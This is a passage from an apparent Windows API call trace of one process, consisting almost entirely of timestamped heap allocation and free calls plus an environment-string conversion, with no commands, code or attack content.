Size=0x4e6) returned 0x448ae0 [0111.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x448ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0111.160] FreeEnvironmentStringsW (penv=0x448100) returned 1 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x43a7d0 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1f) returned 0x43b260 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x434b40 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x434b80 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x440630 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x434bc0 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x434c00 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b7d0 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd) returned 0x433fb0 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b860 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x433eb0 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x15) returned 0x439900 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x434090 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x4325f0 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x69) returned 0x433ef0 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x440720 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b470 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x440220 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x433f70 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x18) returned 0x43ba20 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1b) returned 0x43b890 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b8c0 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x43ba40 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b920 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x6b) returned 0x43ba80 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x438d00 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xf) returned 0x438d20 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x438d40 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x448550 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x448150 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x438d60 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x21) returned 0x43b950 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x449280 [0111.161] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x22) returned 0x43b980 [0111.162] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x449240 [0111.162] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448ae0 | out: hHeap=0x430000) returned 1 [0111.162] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x4493e0 [0111.164] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b9b0 [0111.164] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x453790 [0111.166] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.166] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x45db40 [0111.390] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440400 [0111.390] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x46da40 [0111.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b9b0 | out: hHeap=0x430000) returned 1 [0111.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db40 | out: hHeap=0x430000) returned 1 [0111.392] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x448910 [0111.392] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x47d940 [0111.392] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.393] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1ea7) returned 0x47dda0 [0111.393] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xf40) returned 0x4493e0 [0111.393] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x7a0) returned 0x44a330 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dda0 | out: hHeap=0x430000) returned 1 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xbf0) returned 0x4493e0 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44a330 | out: hHeap=0x430000) returned 1 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x448910 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1247) returned 0x47d940 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x520) returned 0x448910 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b56) returned 0x4493e0 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x47d940 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x28ed) returned 0x44af40 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.394] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x550) returned 0x448910 [0111.394] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.395] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2537) returned 0x47d940 [0111.395] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x12b7) returned 0x4493e0 [0111.395] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x950) returned 0x44d840 [0111.395] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.395] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.395] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x3d4f) returned 0x44e1a0 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44af40 | out: hHeap=0x430000) returned 1 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44d840 | out: hHeap=0x430000) returned 1 [0111.396] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2377) returned 0x47d940 [0111.396] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x11d7) returned 0x451f00 [0111.396] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8e0) returned 0x4493e0 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x451f00 | out: hHeap=0x430000) returned 1 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.396] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5b0) returned 0x448910 [0111.396] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.396] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x448910 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5be2) returned 0x45db40 [0111.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44e1a0 | out: hHeap=0x430000) returned 1 [0111.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x890) returned 0x47d940 [0111.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac0) returned 0x47d940 [0111.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b9b0 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x47d940 [0111.397] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x47e2b0 [0111.397] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x460) returned 0x448910 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0f) returned 0x47ec20 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47e2b0 | out: hHeap=0x430000) returned 1 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c17) returned 0x463730 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe00) returned 0x47d940 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x700) returned 0x465350 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463730 | out: hHeap=0x430000) returned 1 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x153d) returned 0x463730 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47ec20 | out: hHeap=0x430000) returned 1 [0111.398] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465350 | out: hHeap=0x430000) returned 1 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2277) returned 0x47d940 [0111.398] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1157) returned 0x464c80 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x465de0 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x464c80 | out: hHeap=0x430000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1fc7) returned 0x47d940 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463730 | out: hHeap=0x430000) returned 1 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465de0 | out: hHeap=0x430000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1657) returned 0x463730 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xb20) returned 0x464d90 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x590) returned 0x47f910 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463730 | out: hHeap=0x430000) returned 1 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x464d90 | out: hHeap=0x430000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f96) returned 0x463730 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.399] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f910 | out: hHeap=0x430000) returned 1 [0111.399] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2b47) returned 0x4666d0 [0111.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x15b7) returned 0x47d940 [0111.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xad0) returned 0x47ef00 [0111.400] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4666d0 | out: hHeap=0x430000) returned 1 [0111.400] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.400] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47ef00 | out: hHeap=0x430000) returned 1 [0111.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2697) returned 0x4666d0 [0111.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1367) returned 0x47d940 [0111.400] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9a0) returned 0x47ecb0 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4666d0 | out: hHeap=0x430000) returned 1 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x474d) returned 0x4666d0 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463730 | out: hHeap=0x430000) returned 1 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47ecb0 | out: hHeap=0x430000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x920) returned 0x47d940 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b47) returned 0x47d940 [0111.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xd90) returned 0x46ae30 [0111.401] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6d0) returned 0x47f490 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46ae30 | out: hHeap=0x430000) returned 1 [0111.401] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f490 | out: hHeap=0x430000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5d0) returned 0x448910 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x6adf) returned 0x4493e0 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4666d0 | out: hHeap=0x430000) returned 1 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1887) returned 0x47d940 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xc30) returned 0x47f1d0 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x620) returned 0x448910 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47f1d0 | out: hHeap=0x430000) returned 1 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8f0) returned 0x47d940 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x480) returned 0x448910 [0111.402] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x240) returned 0x47e240 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448910 | out: hHeap=0x430000) returned 1 [0111.402] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47e240 | out: hHeap=0x430000) returned 1 [0111.404] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x440cc0 [0111.404] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b9b0 | out: hHeap=0x430000) returned 1 [0111.404] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db40 | out: hHeap=0x430000) returned 1 [0111.404] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.405] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440cc0 | out: hHeap=0x430000) returned 1 [0111.405] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x4493e0 [0111.405] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47d940 [0111.407] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.407] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x45db40 [0111.408] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.408] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b3b0 [0111.408] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9900) returned 0x4493e0 [0111.408] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bf0) returned 0x47d940 [0111.409] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d940 | out: hHeap=0x430000) returned 1 [0111.409] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9937) returned 0x47d940 [0111.410] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493e0 | out: hHeap=0x430000) returned 1 [0111.411] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x4401d0 [0111.411] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b3b0 | out: hHeap=0x430000) returned 1 [0111.411] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x453790 | out: hHeap=0x430000) returned 1 [0111.411] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x46da40 | out: hHeap=0x430000) returned 1 [0111.412] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440400 | out: hHeap=0x430000) returned 1 [0111.412] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4493e0 [0111.412] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x467480 [0111.412] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8) returned 0x438d80 [0111.412] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x487280 [0111.413] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449080 [0111.413] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d80 | out: hHeap=0x430000) returned 1 [0111.413] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x49a490 [0111.413] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x18) returned 0x449060 [0111.413] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449080 | out: hHeap=0x430000) returned 1 [0111.413] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4ad6a0 [0111.414] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b9b0 [0111.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x449060 | out: hHeap=0x430000) returned 1 [0111.414] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4c08b0 [0111.414] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x30) returned 0x4482d0 [0111.414] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b9b0 | out: hHeap=0x430000) returned 1 [0111.414] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4d3ac0 [0111.415] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4e6cd0 [0111.415] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x48) returned 0x440db0 [0111.415] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4482d0 | out: hHeap=0x430000) returned 1 [0111.416] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x4f9ee0 [0111.416] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x50d0f0 [0111.416] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e10080 [0111.418] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x68) returned 0x438d80 [0111.418] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x440db0 | out: hHeap=0x430000) returned 1 [0111.418] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e23290 [0111.418] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e364a0 [0111.419] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e496b0 [0111.419] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e5c8c0 [0111.419] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x98) returned 0x434c50 [0111.419] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x438d80 | out: hHeap=0x430000) returned 1 [0111.420] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e6fad0 [0111.420] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e82ce0 [0111.420] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1e95ef0 [0111.421] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ea9100 [0111.421] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ebc310 [0111.422] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ecf520 [0111.422] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0) returned 0x434880 [0111.422] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434c50 | out: hHeap=0x430000) returned 1 [0111.422] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x1ee2730 [0111.423] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2010080 [0111.677] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2023290 [0111.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20364a0 [0111.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20496b0 [0111.678] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x205c8c0 [0111.679] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x206fad0 [0111.679] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2082ce0 [0111.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2095ef0 [0111.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x150) returned 0x43b0b0 [0111.680] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x434880 | out: hHeap=0x430000) returned 1 [0111.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20a9100 [0111.680] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20bc310 [0111.681] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20cf520 [0111.681] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20e2730 [0111.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x20f5940 [0111.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2108b50 [0111.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x211bd60 [0111.683] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x212ef70 [0111.683] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2142180 [0111.683] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2155390 [0111.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21685a0 [0111.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x217b7b0 [0111.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x218e9c0 [0111.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21a1bd0 [0111.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1f8) returned 0x448910 [0111.685] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b0b0 | out: hHeap=0x430000) returned 1 [0111.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21b4de0 [0111.685] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21c7ff0 [0111.686] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21db200 [0111.686] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x21ee410 [0111.687] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2210080 [0111.689] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x2223290 [0111.690] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x13200) returned 0x22364a0 [0111.690] RtlAllocateHeap 